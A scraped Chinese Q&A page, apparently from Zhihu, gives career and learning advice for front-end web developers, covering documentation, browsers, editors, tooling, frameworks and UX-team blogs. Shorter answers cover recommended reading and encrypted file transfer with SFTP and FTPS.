读懂代码(除英文外,还需要懂编程语言)。&br&&br&&b&从书本里解脱出来&/b&&br&目前市面上的现有的所有技术书籍质量普遍不高,相比较技术书籍,我更愿意新人学会看文档,甚至到达一定水准,直接看代码就知道该怎么用一些技术了。&br&&br&说一些日常发现的比较多的问题,我发现即使很多文档写的条理清晰、Demo齐全,新人读起来还是非常吃力。一方面某些技术的涵盖的范围很广,新人知识结构比较片面,很难理解一些概念;另一方面新人大多是看书和课后习题出来的,文档读的太少了,不能理解文档的意图。&br&&br&分享两个我至今还一直在参考的文档网站:&br&&br&入门级:&a href=&///?target=http%3A//.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&w3school 在线教程&i class=&icon-external&&&/i&&/a&、&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&& 的页面&i class=&icon-external&&&/i&&/a&&br&参考书:&a href=&///?target=https%3A//developer.mozilla.org/zh-CN/docs/Web& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Web 技术文档&i class=&icon-external&&&/i&&/a&&br&&br&Demo平台,你可以在这里运行你的Demo。&br&&br&&a href=&///?target=http%3A//codepen.io/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&codepen.io/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A//jsfiddle.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Create a new fiddle&i class=&icon-external&&&/i&&/a&&br&&b&&br&你要了解的两个窗口:浏览器和编辑器&/b&&br&&br&&b&1. 浏览器&/b&&br&&b&Safari &/b&Webkit&br&&b&Chrome &/b&Blink(Webkit分支)&br&&b&Opera &/b&Webkit,早先的Presto就不拿来说了。&br&&b&Firefox &/b&Gecko&br&&b&IE &/b&Trident&br&&br&&b&2. 编辑器&/b&&br&&b&Sublime Text&/b& 首推&br&&br&&b&vim/emacs&/b& 太极端了&br&&b&IDE&/b& 太笨重了&br&&br&浏览器 & 编辑器 会是你以后最重要的两个伙伴了,学会和她们相处,对工作效率的提升不是一丁半点。怎么相处?那是你的事儿了。&br&&br&&b&加入校内Web团队,找兼职工作或者去有意的公司实习&/b&。&br&不同团队,不同项目所用到的技术栈都不一样,你可以从校园内部开始,逐渐把目光放的更长远,你可以关注一些意向公司的动态,了解他们的需求,可以关注他们的微博,你可以用寒暑假的时间去不同公司感受前端在不同公司的不同之处,对于拓宽视野非常有帮助。&br&&br&&b&关注开源项目、技术社区和技术博客。&/b&&br&&br&推荐几个我平时关注的平台:&br&&br&&a href=&///?target=https%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&GitHub · Where software is built&i class=&icon-external&&&/i&&/a&&br&Github可以是搜索引擎、可以是社交平台、可以是项目托管平台。你可以近距离的看到世界级的精英都怎么写代码的。我平时大量时间都泡在Github上看代码了,我的编程水平也不高,但是我知道怎么去欣赏一个项目,这是一种享受,跟看了一本小说一样。&br&&br&多说几句:我很少看技术书籍,我学编程不是从语法开始的,我喜欢直接看整体项目,然后自我感悟。再带着问题去Google解决自己的疑问。&br&&br&&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Stack Overflow&i class=&icon-external&&&/i&&/a&&br&除了Github外,Stack Overflow也帮我解决了诸多平时项目中遇到的坑。&br&&br&&a href=&///?target=https%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&CSS-Tricks&i class=&icon-external&&&/i&&/a&&br&不得不说CSS Tricks上有很多高质量的文章,但对我自己来说,我更多的是来凑个热闹,看看文章,看看评论,学习下英文不亦乐乎。&br&&br&&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SegmentFault&i class=&icon-external&&&/i&&/a&&br&除了看每周精选外,我很少在SegmentFault上搜东西。但是作为从Typecho关注过来的人,还是特别希望SegmentFault能有好发展。&br&&br&&a href=&///?target=http%3A///blog/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&阮一峰的网络日志&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=https%3A///ruanyf& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ruanyf (Ruan YiFeng) · GitHub&i class=&icon-external&&&/i&&/a&&br&国内技术博客第一人,无他。&br&&br&&b&参与开源项目的维护与开发&/b&&br&&br&到达这个层次的大学生较少,这个阶段你会学会git的精髓。&br&&br&&br&&b&--------------------------------------------------------------------&/b&&br&&br&&b&日续写......&/b&&br&&br&这个话题实在太大,我尝试分几点把这个大话题讲的稍微明白一些。&br&&br&&b&前端根据人的特点可以分为两个流派:切图流、技术流。&/b&&br&&br&一般来说懂平面设计的人做前端切图会更细腻一些,懂设计的前端也只在切图时候会体现出一些优势,对于重视技术流的前端公司,懂不懂设计对他们来说不是重点。技术流派甚至都不会切图,他们的大把时间都消耗在专研技术里了,什么技术,这些之后再说。&br&&br&&br&&b&一、切图流&/b&&br&&br&切图需要熟悉PS和AI的切图技能,简单说就是把设计稿的web元素导出为jpg/png/svg等等,结合这些元素把设计稿转化成web页面。切图是个非常需要耐心的工作,需要把设计稿&b&精确&/b&的转化成页面,需要解决浏览器的各种&b&兼容性&/b&问题、&b&响应&/b&问题。&b&如果你只是在国内某些大包大揽的建站公司做切图,那是灾难,而且会养成很多陋习。&/b&如果有幸和国外的优秀的设计团队合作,会是一种享受。但是设计师们对页面细节要求非常苛刻,如果你只懂得HTML+CSS技能根本不足以支撑你完成一份高质量的切图。&br&&br&国内大公司前端都比较技术流,没有那么多精致的设计稿让你切,国内建站公司的切图又太垃圾,所以如果做切图去一些面向国外的小团队体验一下吧。&br&&br&&b&切图的基础工作:PSD2HTML和AI2HTML,PSD2CMS,PSD2BACKEND。&/b&&br&&br&&b&PSD2HTML和AI2HTML&/b&:主要负责把设计稿精确的转化成html页面。&br&&b&PSD2CMS&/b&:直接转化为cms的主题,需要比较懂cms系统,比如WordPress,Drupal之类。&br&&b&PSD2BACKEND&/b&:直接套到某个后端语言的框架里。这个难度级别比较高。&br&&br&在一个专业的团队里,切图主要负责的工作就是&b&PSD2HTML和AI2HTML,&/b&这一类人一般水平比较局限,需要掌握基本的html+css技能,如果懂js就更好了。&br&相比较 &b&PSD2CMS & PSD2BACKEND &/b&一般都是偏fullstack的比较多,多见于全职soho。&br&&br&&b&切图的另一项重点:&/b&&b&代表&/b&&b&页面效果&/b&&b&的CSS3和JQuery及其各类插件。&/b&&br&&br&一般这类设计师都比较时尚,有些设计团队是从flash转来的,对页面效果特别有追求。跟这类设计师合作是个技术活。&br&&br&页面效果一般来说&br&&br&CSS3中比较简单的transition和transform ,难的有keyiframes的animation,最难的是CSS3和JQuery的结合,需要应用到各种插件等等。深坑,涉及面太广暂不深入讨论了,时间原因,以后有空整理几套给力的例子出来大家看看。&br&&br&&b&切图工作者的进阶技能&/b&&br&&br&HTML结构和页面模块化。&br&在此基础上了解怎么使用Sass/Stylus/Less等CSS预编译器。&br&&br&切图能好这点技能已经相当牛逼了。&br&&br&&br&&b&二、技术流&/b&&br&&br&&b&包管理器:&/b&npm、bower&br&&b&前端构建工具:&/b&grunt、gulp和它们各自的插件&br&&b&模块加载&/b&&b&器&/b&&b&:&/b&requirejs、webpack、systemjs&br&&b&代码规范:&/b&ES5/ES6、Commonjs、AMD&br&&b&语法糖:&/b&Coffeescript、Typescript、Dart...&br&&b&CSS预编译器:&/b&Sass、Stylus、Less&br&&b&DOM操作:&/b&JQuery...&br&&b&前端&/b&&b&框架:&/b&Backbone、Ember、Angular、Flux(React)&br&&b&后端框架:&/b&express、meteor&br&&b&模版引擎:&/b&handlebars、swig、nunjucks、ejs、jade...&br&&b&协议:&/b&http、websocket...&br&&br&作为一个技术流怎能不熟练各种技术的单词拼写?&br&&br&上面总结了这么多,不是想说我多么懂这些技术,而是表现了现阶段的前端发展真TM混乱,这是后端开发无法理解的事儿。&br&&br&和其他脚本语言不同,JavaScript的特点总结三点:&br&&br&1. Callback&br&2. Event&br&3. Promise&br&&br&留空补充....&br&&br&&b&Webapp时代怎能不提restful?&br&&/b&&br&这部分需要学习了解几种网络协议:&br&&br&1. http&br&2. websocket&br&&br&&br&&b&项目托管&/b&&br&&br&Git&br&&br&时间有限,就先写这么多了.....&br&&br&--------------------------------------------------------------------------------------&br&&br&前端是近几年发展起来的职业,很多人对前端的认识比较模糊,因此开篇我有必要介绍一番,前端(这里的前端是大众口中的前端)偏美工是视觉设计,前端偏用户是用户体验,前端偏目标导向是交互设计,前端偏技术才是大家口中的前端。和前端有关系的几样技术:PS,DW,FL,HTML+CSS+JS,看过很多人给前端的建议也差不多是学习这几种软件和HTML+CSS+JS等等了,不过我却觉得大家在把前端往一个误区引导。为什么呢?听我慢慢解释。&br&先来说说和前端有联系的几个职位:前端工程师、视觉设计师、用户研究工程师、交互设计师。我用一个简单的例子来分析:我们都经常在一些社区评论留言,留言的表面过程:打开留言页面——输入留言内容——点击提交按钮——留言显示在留言列表上。我这里不解释这个过程的实现原理。&br&&br&---日修改---&br&&strong&前端工程师:留言框代码怎么写?&/strong&留言框的显示、一些JS动态效果的显示(可能涉及异步请求)。&br&&strong&视觉设计师:什么样的留言框最漂亮?&/strong&怎么布局?用什么色彩还是需要做一些纹理?&br&&strong&用户研究工程师:用户怎么留言最舒服?&/strong&很多人可能会和用户体验师混淆在一起,其实这两种人有着本质的区别,用户研究更侧重的是方法论,注重问卷调查访谈等等行为来了解用户的潜在行为习惯,而用户体验是一种行为,更侧重的是体验之后的实际感受。&br&&strong&交互设计师:留言过程中的反馈?&/strong&输入错误后的提示,留言成功后的反馈等等。交互设计可以理解为人机对话,交互设计侧重和用户交流之后,引导用户有效操作,比如鼠标放在超链接上字体变颜色,有title提示,用户点击超链接,我们就可以称这次交互是成功的,因此交互设计的重点在于目标向导。&br&&br&---修改结束---&br&&br&这些分工十分细微,如果留言本是一个项目的话,需要从几个不同的角度来分析留言框,一个大型的项目比如社交网站、门户网站、行业网站这些职位都必须明确分工才能把整个项目做好,但是实际上即使条理清晰在项目开展过程中还会出现诸多意想不到的问题,什么问题呢?不在本文讨论范畴。回到话题,现在你还认为你理解意义上的前端是前端吗?我以前以为前端是美工,但是后来我发现很多前端博客都在研究一个技术JS的各大框架,我更加确定前端并不是我理解意义上的前端,我更喜欢视觉设计,但是我依旧也是一个前端,所以前端是模糊的,甚至包括了一切。&br&&strong&前端没什么不好&/strong&&br&如果你觉得前端没有前(钱)途,那我劝你干别的行业吧,如果你确定你喜欢前端,那就听听我的一些看法,当然也纯属主观臆断,你可以拍砖。逛过一些前端博客,大部分文章都是在分享JS的几大框架技术,Jquery占很多数,那其他框架呢?所以我也有个疑问,&strong&前端难道就是JS吗?最后我的答案:是的,如果你想成为纯粹意义上的前端,JS很大部分上代表了前端。&/strong&&br&&strong&程序员眼中的前端(后端程序员和前端工程师的不同)&/strong&&br&真正意义上学习编程是在大学的时候,那时候我的一个师长,他现在是Java工程师,他给我的建议是HTML+CSS随便玩玩就好了,我不太认同他的观点还是玩了很久,我并没有停留在HTML上,而是了解了更多技术,HTML是很多技术人都不耻的语言,甚至在一些人看来HTML连编程语言都不是,这个我在大学招新时候很有感触,他们觉得HTML不值钱又是小儿科的东西,连PHP他们都觉得2个小时就能上手,那HTML他们不用看就懂了,甚至在一些无知的人看来网站开发不算真正意义上的程序,因此也就不是程序员了,因为他们的眼中只有C/C++,很多前人的建议也是学编程从C开始学起,我现在再来看这种回答,真好笑,无知的人在骗无知的人罢了。尤其再看看那些人在做着二级、三级试卷,我当时就想说哥们儿你醒醒吧,但是我还是忍住了,因为他跟我无关。&strong&所以不要以程序员的思维来看待前端,前端是快乐的,不是挑战各种技术。&/strong&&strong&前端的出发点也是用户(体验等等),程序员是以电脑为核心(算法等等)。&/strong&千万要记住前端是以用户为出发点的,而在很多公司面试前端工程师时,只考察了前端工程师的编程技巧。&br&&strong&如果你确定你想做一个优秀的前端,我的个人建议:&/strong&&br&&strong&首先,了解HTTP协议(HTTP 1.1),玩弄各大浏览器于鼓掌之中,&/strong&你是前端工程师不要跟我说你只知道IE核心的浏览器。IE系列,Firefox,Chrome,Opera,Safari都应该是你平时常用的浏览器,我经常使用chrome,其中elements,Resources,Network,Script,....这些你了解多少?还是你从来都不知道?那赶紧去了解吧。&br&&strong&其次,非常熟悉HTML+CSS+JS。&/strong&我把学习技术放到了第二位,因为你必须首先了解整个网络,你才会更快捷和全面的了解前端技术。&br&之前说过很多技术人都不耻学HTML,那我来解释&strong&为什么要先学HTML?&/strong&&br&先和大家一起梳理各类编程语言,大致分为了六大类:网页语言、解析型语言、混合型语言、编译型语言、汇编语言和机器语言,依次越来越苦逼,无论从用户还是开发者角度看待,越深入越不能让人理解,用户体验越差,当然开发者也是用户,所以也就能理解为什么会有PHP、Python,Ruby之类的解释型语言了。&br&如果你只想学习好前端技术的话,只需要了解前两层的东西,也就是网页语言和解析型语言,网页语言HTML,解析型语言PHP,Python,Ruby至少要学会一种。如果你有更多的精力,你可以跳到更高层次,学习混合型语言C#或者Java,对于编译型语言C和C++如果你想做好前端工作,你可以不用懂得的。&br&&strong&为什么前端工程师需要了解这些编程语言呢?&/strong&&br&一个WEB项目需要三种人:项目经理、前端工程师和后端程序员,他们之间需要沟通,不懂得如何沟通?如何说服?懂得能让项目进展的更顺利一些。我们回到刚才的例子——留言本,过程可以参照PHP的CGI(请求和响应等等),如果你不懂或者还是很模糊的话,我认为你还不是一个合格的前端工程师,当然你可以说你更偏向于视觉设计、用户体验之类的了。我的这种说法并不绝对,甚至如果你觉得你需要鼓励才能进步?那不好意思了,我只知道这是残酷的招聘法则,你可以去看看各公司对招聘前端的要求。&br&最后HTML5很重要,就犹如空气,看似不存在,好似不重要,但是缺少了空气,人类就无法生存,所以HTML是根本。&br&&strong&再次,艺术品的欣赏能力。&/strong&PS、切图等等这些只是工具,工具只要经常用就会的,但是欣赏能力,或者只能说是天生的了,但是也要多培养自己的艺术欣赏能力,或者说让自己时髦起来。学会欣赏学会鉴别,其他的不多说了。&br&&strong&最后,关注前端们都在做什么?&/strong&国外的我不推荐,我觉得国外的天空没那么蔚蓝。腾讯、新浪、淘宝、网易、百度……很多公司都有前端体验中心,他们的前端博客你知道不?他们在干什么?这些你了解吗,去了解他们在干什么吧,慢慢你就能培养出你的前端嗅觉了。&br&&strong&学会思考,自己去辨别真伪,&/strong&每个人都有自己的体验,本篇文章纯属一家之言,主观臆断的说法,你可以参考并自己去验证,这也是前端工程师需要学会的东西。&br&&strong&推荐几个大公司的UED相关方面的博客(从月光博客抠过来的,总结的蛮全的):&/strong&&br&1,淘宝UED &a href=&///?target=http%3A///blog& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&TaoBaoUED | 做地球上最好的 UED&i class=&icon-external&&&/i&&/a&&br&2,新浪UED &a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&新浪UED | 一个关注用户体验、关注工作流、关注作品质量的有爱团队&i class=&icon-external&&&/i&&/a&&br&3,阿里巴巴UED &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&阿里巴巴(中国站)用户体验设计部博客&i class=&icon-external&&&/i&&/a&&br&4,UCD大社区 &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&UCD大社区 - 以用户为中心的设计&i class=&icon-external&&&/i&&/a&&br&5,支付宝UED:&br&交互设计:&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&视觉设计:&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&用户研究:&a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&错误页面 - 支付宝 知托付!&i class=&icon-external&&&/i&&/a&&br&6,百度MUX &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度MUX&i class=&icon-external&&&/i&&/a&&br&7,腾讯CDC &a href=&///?target=http%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&腾讯CDC&i class=&icon-external&&&/i&&/a&&br&8,携程UED &a href=&///?target=http%3A///blog/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&携程UED-携程旅行前端开发团队&i class=&icon-external&&&/i&&/a&&br&9,百度泛用户体验 &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FEX 做最专业的前端&i class=&icon-external&&&/i&&/a&&br&10,腾讯WSD &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&腾讯MXD移动互联网设计中心&i class=&icon-external&&&/i&&/a&&br&11,微博UDC &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&微博UDC | 让设计无“微”不至&i class=&icon-external&&&/i&&/a&&br&12,网易UEDC &a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&网易用户体验设计中心&i class=&icon-external&&&/i&&/a&&br&13,CUED-迅雷用户体验设计中心 &a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&--- 日 续写 ---&br&&br&有段时间没来知乎了,今天进来一看突然发现这篇回答赞同数暴涨,吓我一跳!!!!&br&文章是2012年年初写的,当初刚入行,瞎写了一通,改过几次,后来发现没有多少读者也就不了了之了(现在再来看内容,自己都看不下去了,我非常赞同 &a data-hash=&42aa0150898acf8cf796c& href=&///people/42aa0150898acf8cf796c& class=&member_mention& data-editable=&true& data-title=&@姚垚& data-tip=&p$b$42aa0150898acf8cf796c&&@姚垚&/a& 的观点,这篇文章其实写的很烂也很浅显)。为了对读者负责,我继续补充一些自己现在对这份职业的重新认识&br&&br&上文说的那些都是瞎扯淡,前端说简单些就包括几点:&br&&br&1. 浏览器&br&2. 切图&br&3. 语言&br&4. 框架&br&5. 项目托管&br&6. 待不充&br&&br&没时间了,晚上有空回来续写.....&br&&br&拖拽至此处上传&br&&br&拖拽至此处上传
为了能让大家第一眼阅读到最新内容,更新就写到上面了。这篇文章写于12年年初,到现在有三年多了,截至到现在赞同数494,被收藏 1199 次,不算多。问题被编辑多次之后,原回答已经不是很符合意境了,所以我还是继续补充了。技术背景:可能擅长php+js2015年1…
我的建议:&br&1. 选本好书&br&&a href=&///?target=http%3A///subject/2994925/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/subject&/span&&span class=&invisible&&/2994925/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///subject/4886879/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/subject&/span&&span class=&invisible&&/4886879/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&2. 阅读源码&br&&a href=&///?target=https%3A///languages/JavaScript& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&/languages/Ja&/span&&span class=&invisible&&vaScript&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&3. 实践、实践、再实践&br&&br&4. 关注行业动态,参与开源社区&br&这几个blog至少要订阅:&br&&a href=&///?target=http%3A//www.nczonline.net/blog/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&nczonline.net/blog/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///r/javascript/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/r/javascript&/span&&span class=&invisible&&/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
我的建议:1. 选本好书2. 阅读源码3. 实践、实践、再实践4. 关注行业动态,参与开源社区这几个blog至少要订阅:…
这个时候会用基于ssh的scp,sftp
这个时候会用基于ssh的scp,sftp
FTP协议本身无法加密传输的文件,但是可以通过基于SSL的FTP来实现加密传输,即使用FTPs来传输文件,应该大多数的FTP软件都支持的,你只要在软件设置修改下就可以实现了。
FTP协议本身无法加密传输的文件,但是可以通过基于SSL的FTP来实现加密传输,即使用FTPs来传输文件,应该大多数的FTP软件都支持的,你只要在软件设置修改下就可以实现了。
586 人关注
114 个回答
11066 人关注
235 个回答
445 人关注
193 人关注
7344 人关注
1112 个回答}
我要回帖
更多推荐
- ·p22钢板对应的美标线标准是多少?
- ·中国真的是战狼2雇佣兵战斗力排名的禁地?难道真的如战狼里说的一样?中国真的会为了几...
- ·女人佩戴新疆和田玉手镯好吗处-和田玉资讯
- ·大皇帝骑兵最强阵容平民骑兵流怎么玩介绍_大皇帝骑兵最强阵容平民骑兵流怎么玩是什么
- ·解放战争中,舍身炸碉堡的英雄是哪位革命英雄是?
- ·有采纳,高赏金,数学解题高手高中数学来
- ·哪款qq邮件群发软件破解版好用?谁能跟我说一下吗??
- ·怎么把java的背景音乐java关掉gui的代码,现在已经可以成功播放,但是关不掉了
- ·求这些图的高清版,谢谢亲们_(:з」∠)_
- ·邂逅美女 求介绍一个女票
- ·谁有乡村爱情8云盘资源资源呀,给个吧
- ·关于四个条件的条形统计图板书设计改咋设计
- ·怎么样在线制作举例图片自己的名字像我举例的图片,和开场白!怎么做啊!记住是动态的图片
- ·谈谈您对我国香城新都网公众参与与现状的认识
- ·哪位亲有蜀山战纪之剑侠传奇第四季资源?拜求啊
- ·重装系统格式化所有盘用什么软件好我想把电脑(台式机)格式化因为太卡了
- ·腾飞搜狗输入法法下载
- ·刚入市的汽车小白入门应该去选哪类的软件比较好?
- ·我的世界pm汉化版下载开服器下载0.12.1
- ·谁有网站注入 脚本小子子常用的工具软件,可以的话分享一下😊
- ·求各位求助大神这是什么歌2救我。。
- ·阳光亿信安卓版下载专业安装阳光棚到手机
- ·遗传算法求解tsp问题此题
- ·求罗东进戴相龙女婿车峰照片汪波照片
- ·creo打不开prt后缀为asm是否可以保存为prt文件
- ·手机主题壁纸软件控这个软件中怎样设置壁纸
- ·苹果5s,今天不知道为什么有了一个软件叫协奏助手下载,卸载不了咋办?
- ·怎样自己制作文字表情。求高手指教。谢谢老板表情 就像下面这些
- ·有ipad免费软件推荐的软件吗?按到手机里看股市推荐一下的?
- ·求一个木兆谷纟会里香的迅雷赚钱宝 百兆连接
- ·借个怎么更改苹果id账号帐号
- ·车的数码收音机播放器坏了,我的车载播放器怎么用
- ·QQ音乐和酷狗音乐哪个好用 好在哪里? 我手机是OPPOoppo r8007刷机教程的
- ·功放上Bl-WIRING功放前后级是什么意思思
- ·松下全自动松下洗衣机特价洗一缸衣服要多长时间
